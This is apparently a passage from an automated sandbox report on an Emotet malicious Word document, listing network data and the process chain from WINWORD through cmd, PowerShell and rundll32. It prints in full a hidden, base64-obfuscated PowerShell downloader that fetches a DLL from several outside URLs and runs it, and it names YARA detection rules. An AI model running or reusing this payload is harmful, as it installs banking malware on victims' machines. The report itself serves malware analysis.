9e 77 5b 34 70 9a 93 9c 67 1a 7b 44 1d 36 ad 73 cf 87 13 74 25 fb 0a f3 bd 81 1d 30 6e 2b a6 95 7a c2 11 2b ba 42 f0 f9 32 db e7 d8 2d 26 2c 45 b1 92 ac 26 52 75 94 72 2c 41 c6 d4 41 89 b9 5b 87 c1 8f f2 b5 a9 33 b0 2e b5 07 40 b4 c8 9c fc 6a 79 56 5e 30 6b 1f 31 e4 0c ea 04 78 0b 6f 36 6a 33 0a 14 e4 33 ea c7 cc 32 78 8a ae 5b 45 53 6a 99 cb 10 da 76 eb b8 56 81 42 69 ac 92 51 6d 7a 54 e6 a6 70 10 f8 2e 4f ef 0f 41 21 54 0c 5a a4 6f c3 9c 73 a8 3f 43 07 05 22 37 03 d1 70 ef 90 75 09 05 4c 2b 45 09 ee b4 c8 fb 3b 98 b7 6f 47 ff e0 06 00 bb 8a e5 73 c9 e0 9c 9e 5d dc 8a 06 eb dd 82 6d 4b 26 8f fa 82 7d a0 05 ea 99 5e c4 27 fe 42 a8 76 c9 a2 58 2d Data Ascii: a44dUql/}"S:14z!F@H/,IBJF8E6`V JWd4lrv(Ow#WIA^2Zn~)2m4s(midz{p=ty?U&i1=rq$N-rk"(Q-/o#4m/c!?Ck_yY%f(pmf#k^+"[]!C5v+OAT1M(Q etndUX/d/E&3"FwT7.@sROI&b6T;i7$Jwdt_asJ?%A$I[t?`m#?DD%=o/Xf9=\7w52XpI&]"KR_ZdsRZ?II%L)a/.E]U.-$}3vStQQ$Je3ON_.t"e:Zu:}kn[LH`\|yHwQUtD7D(Bq<yur@dhQAK[O3l9zgmZp:b,xj;A@\V/KW<D*V)O}\'p@BBt5-Dnsc 0nxaV886k~O0W`e4O\wt]pw[4pg{D6st%0n+z+B2-&,E&Rur,AA[3.@jyV^0k1xo6j332x[ESjvVBiQmzTp.OA!TZos?C"7puL+E;oGs]mK&}^'BvX-
Jan 6, 2021 15:49:19.008038044 CET	233	IN	Data Raw: d3 f2 e5 09 16 99 36 f1 19 9c 80 5c eb 2a e3 51 95 70 09 f5 8a c3 0e 55 17 c9 ae 31 6e a0 2e c9 c7 9c 9a 8e ed f1 85 b2 24 f1 f5 64 9f d2 03 bb a4 2a bc 4f 42 91 c6 80 02 f9 48 aa a9 47 57 37 5b 6a ed a8 36 39 f8 6b be a1 22 0c 54 e0 cc de f3 80 Data Ascii: 6\QpU1n.$dOBHGW7[j69k"T2.#X !REo^36?5)g:Sj7\}\|J44lytk/o%ElHsQU=_AFw9FcTcEf_Q5zu
Jan 6, 2021 15:49:19.080705881 CET	234	IN	Data Raw: f7 6f 4e af d9 05 69 a0 7f 6a c3 fd 82 8f 0e 3f fb fb 2a 9f 1b e8 15 9c 98 29 c1 1e fd 6f 70 f5 ca 8c 60 8f 88 c4 be e2 74 97 93 dc bb 7c 3d 0f 64 0c 5c d2 31 87 d4 63 ff a9 42 78 1d 24 d4 a1 a1 98 7e 30 03 83 50 a5 5f 20 bb 68 91 ff a4 8b 7b ce Data Ascii: oNij?)op`t\|=d\1cBx$~0P_ h{ %![ZI5%8BmO)$9SFoqU`[3]\*\|0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1776 Parent PID: 584

General

Start time:	15:48:38
Start date:	06/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f140000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2436 Parent PID: 1220

General

Start time:	15:48:39
Start date:	06/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
Imagebase:	0x49e90000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 2512 Parent PID: 2436

General

Start time:	15:48:40
Start date:	06/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xffc30000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 1692 Parent PID: 2436

General

Start time:	15:48:40
Start date:	06/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
Imagebase:	0x13fa70000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2102145547.0000000000246000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2102389615.0000000001CE6000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2564 Parent PID: 1692

General

Start time:	15:48:47
Start date:	06/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Imagebase:	0xff8d0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1204 Parent PID: 2564

General

Start time:	15:48:48
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Imagebase:	0x740000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2104218731.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2828 Parent PID: 1204

General

Start time:	15:48:48
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmjhjl\dvgjre.ish',Control_RunDLL
Imagebase:	0x740000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2105708709.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2708 Parent PID: 2828

General

Start time:	15:48:49
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfafpdt\kkujpl.inf',Control_RunDLL
Imagebase:	0x740000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2107419696.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2808 Parent PID: 2708

General

Start time:	15:48:50
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Stxynijtatjphar\aakvwlgscnjram.hbh',Control_RunDLL
Imagebase:	0x740000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2108402593.0000000000210000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2884 Parent PID: 2808

General

Start time:	15:48:50
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oumozqnkirxudf\mcchvdsvabpvx.nrv',Control_RunDLL
